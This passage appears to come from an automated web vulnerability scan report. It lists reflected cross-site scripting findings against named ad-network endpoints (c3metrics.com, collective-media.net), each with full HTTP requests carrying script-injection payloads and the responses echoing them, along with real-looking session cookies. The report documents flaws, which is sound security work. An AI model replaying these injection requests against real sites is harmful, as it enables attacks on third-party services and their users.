ar.c3VJScollection[a]=window.c3Vinter}else this.C3VTcallVar.c3VJScollection[a]=new c3VTJSInter();this.C3VTcallVar.c3VJScollection[a].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver48f1c<script>alert(1)</script>23687cc4e4f';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='905073652130512
...[SNIP]...

5.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86c97<script>alert(1)</script>23c4a47d7b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=/86c97<script>alert(1)</script>23c4a47d7b8&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:19:38 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:19:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-19-38_18329269271305127178; expires=Mon, 09-May-2016 15:19:38 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_18329269271305127178; expires=Wed, 11-May-2011 15:34:38 GMT; path=/; domain=c3metrics.com
Content-Length: 6680
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
c3VJSnuid='18329269271305127178';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='/86c97<script>alert(1)</script>23c4a47d7b8';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the rv request parameter is copied into the HTML document as plain text between tags. The payload 6e217<script>alert(1)</script>fdb7b7f3c24 was submitted in the rv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=6e217<script>alert(1)</script>fdb7b7f3c24&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:15:48 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:15:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-15-48_680058941305126948; expires=Mon, 09-May-2016 15:15:48 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_680058941305126948; expires=Wed, 11-May-2011 15:30:48 GMT; path=/; domain=c3metrics.com
Content-Length: 6697
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
4572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='680058941305126948';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='6e217<script>alert(1)</script>fdb7b7f3c24';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJSc
...[SNIP]...

5.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload d4972<script>alert(1)</script>ab5297d081c was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72d4972<script>alert(1)</script>ab5297d081c&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:15:18 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:15:18 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-15-18_12132052941305126918; expires=Mon, 09-May-2016 15:15:18 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_12132052941305126918; expires=Wed, 11-May-2011 15:30:18 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
his.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='13014572191303613803';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='12132052941305126918';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72d4972<script>alert(1)</script>ab5297d081c';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3V
...[SNIP]...

5.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 626e5<script>alert(1)</script>369e577d9c6 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=626e5<script>alert(1)</script>369e577d9c6&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547; SERVERID=s13

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:16:17 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sat, 14-May-2011 15:16:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-15-16-17_2383504941305126977; expires=Mon, 09-May-2016 15:16:17 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_2383504941305126977; expires=Wed, 11-May-2011 15:31:17 GMT; path=/; domain=c3metrics.com
Content-Length: 6678
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
S.c3VJSnuid='2383504941305126977';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSrvSet='626e5<script>alert(1)</script>369e577d9c6';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSviewDelay='5000';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScallurl=this.C3VTcallVar.c3VJScollection[a].C3VJSFindBaseurl(c3VTconsts.c3VJSconst.c3VJS
...[SNIP]...

5.7. http://480-adver-view.c3metrics.com/v.js [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload 1a3b7<script>alert(1)</script>6f68b5810d4 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=4801a3b7<script>alert(1)</script>6f68b5810d4&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:12 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s6; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=4801a3b7<script>alert(1)</script>6f68b5810d4&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=ne
...[SNIP]...

5.8. http://480-adver-view.c3metrics.com/v.js [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload f12d7<script>alert(1)</script>defaeb0ad4c was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adverf12d7<script>alert(1)</script>defaeb0ad4c&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:04 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s7; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adverf12d7<script>alert(1)</script>defaeb0ad4c&cid=480&t=72&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;
...[SNIP]...

5.9. http://480-adver-view.c3metrics.com/v.js [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /v.js

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 928ea<script>alert(1)</script>06108abd815 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v.js?id=adver&cid=480&t=72928ea<script>alert(1)</script>06108abd815 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-06-2011-11-08-35_990492871304680115ZZZZadver_05-11-2011-14-19-07_16306674721305123547

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 15:14:42 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1049
Connection: close
Content-Type: text/html
Set-Cookie: SERVERID=s3; path=/
Cache-control: private

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3VTJSobj){function fireC3VTJS(){this.fireCall=function(){var a=c3VTconstVal.c3VJSconst.c3VJSurl+'.*$';var b=c3VTconstVal.c3VJSconst.c3VTJSurl+"?id=adver&cid=480&t=72928ea<script>alert(1)</script>06108abd815&rv=&uid=&td=";var c=document.getElementsByTagName('script')[0];var e=document.createElement('script');e.type='text/javascript';e.async=true;e.src='http://480-adver-view.c3metrics.com/'+b;var r=new Reg
...[SNIP]...

5.10. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76df3'-alert(1)-'943c1c41cbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.21776df3'-alert(1)-'943c1c41cbf/L3_5490311;sz=300x250;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAsSqS3y8BAAAAAAAAADRmMmQ3NDM2LTdiZGYtMTFlMC1iZTNjLTBiZWIyOGUxOTU2ZQCCvgEAAAA=,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,;ord=1305125989 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAAACXPS8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSoxAAAAAAAAIAAwAAAAAAuB6F61E4EUAzMzMzMzMTQLgehetROBFAMzMzMzMzE0AzMzMzM7McQAAAAAAAACBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACrjY0s4YgTCsqWZcF5804wEfQ4arOobmuhkNzvAAAAAA==,http%3A%2F%2Fwww.burstnet.com%2Fads%2Fad21832a-map.cgi%2FBCPG175222.253833.315920%2FVTS%3D2jBaC.Ncac%2FSZ%3D300X250A%2FV%3D2.3S%2F%2FST%3D0Qxi0i9J10y61Gbc47hgYD2_3S02vc02vc%2FREDIRURL%3D,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F,Z%3D300x250%26bur%3D2016%26s%3D1858209%26x%3Dhttp%253a%252f%252fwww.burstnet.com%252fads%252fad21832a%252dmap.cgi%252fBCPG175222.253833.315920%252fVTS%253d2jBaC.Ncac%252fSZ%253d300X250A%252fV%253d2.3S%252f%252fST%253d0Qxi0i9J10y61Gbc47hgYD2%255f3S02vc02vc%252fREDIRURL%253d%26_salt%3D2162042623%26B%3D10%26u%3Dhttp%253A%252F%252Fnews.lalate.com%252F2011%252F05%252F11%252Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%252F%26r%3D0,4f2d7436-7bdf-11e0-be3c-0beb28e1956e
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; targ=1; nadp=1; exdp=1; ibvr=1; brlg=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Wed, 11 May 2011 15:30:22 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Fri, 10-Jun-2011 15:30:22 GMT
Content-Length: 1082

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.21776df3'-alert(1)-'943c1c41cbf/L3_5490311;sz=300x250;net=bzo;ampc=http://ad.burstdirectads.com/clk?2,13%3Bf45372e140b1d420%3B12fdf922ab1,0%3B%3B%3B1036566184,T61cAKFaHAA28Y4AAAAAADoBJAAAAAAAAgAMAAIAAAAAAP8AAAAECn4bKAAAAAAACw0SAAAAA
...[SNIP]...

5.11. http://a.collective-media.net/adj/bzo.217/L3_5490311 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.217/L3_5490311

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28fe5'-alert(1)-'13086d8c9b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

